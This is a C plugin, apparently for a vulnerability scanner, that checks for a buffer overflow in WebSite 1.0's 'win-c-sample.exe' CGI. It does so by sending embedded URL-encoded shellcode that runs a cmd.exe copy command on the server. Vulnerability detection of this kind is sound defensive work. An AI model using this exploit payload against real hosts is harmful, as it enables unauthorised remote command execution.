/*
 * 
 * WebSite
 *
 * This plugin was written by Renaud Deraison and is released
 * under the GPL
 *
 */
#include <includes.h>

#define NAME "WebSite 1.0 buffer overflow"
#define DESC "There is a buffer overflow in some WebSite 1.0\n\
CGI scripts which allow a remote intruder to execute any command\n\
on the remote host\n\
Platform affected : WindowsNT\n\
Risk factor : High"
#define COPYRIGHT "no copyright"
#define SUMM "executes some code on a remote host running WebSite 1.0"

int is_http_command_ok(struct arglist * env, char * comm);




PlugExport int plugin_init(struct arglist *desc);
PlugExport int plugin_init(struct arglist *desc)
{
	plug_set_name(desc, NAME);
	plug_set_description(desc, DESC);
	plug_set_summary(desc, SUMM);
	plug_set_copyright(desc, COPYRIGHT);
	plug_set_category(desc, ACT_ATTACK);
	plug_set_family(desc, "Remote file access");
	plug_set_dep(desc, "find_service.nes");
	return(0);
}





PlugExport int plugin_run(struct arglist * env);
PlugExport int plugin_run(struct arglist * env)
{
	int port = (int)plug_get_key(env, "Services/www");
	char * command = "/cgi-shl/win-c-sample.exe?+-+-+-+-+-+-+-+-+-+-+-+-\n\
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+h^X%FF%E6%FF%D4%83%C6Lj%01V%8A\n\
%06<_u%03%80.?FAI%84%C0u%F0h0%10%F0wYhM\\y[X%050PzPA9%01u%F0%83%E9%10%\n\
FF%D1h0%10%F0wYh%D0PvLX%0500vPA9%01u%F0%83%E9%1C%FF%D1cmd.exe_/c_copy\n\
_\\WebSite\\readme.1st_\\WebSite\\htdocs\\x1.htm";

	if(!port)port = 80;
	if(host_get_port_state(env, port)<=0)return(0);
  	if(!is_cgi_installed(env,"x1.htm"))
        {
         is_cgi_installed(env, command);
         if(is_cgi_installed(env, "x1.htm"))
         {
          post_hole(env, port,
"There is a buffer overflow in the remote script 'win-c-sample.exe' \n\
which allow a remote intruder to execute any command\n\
on the remote host\n\
Solution : delete this script");
         }
        }
	return(0);
}
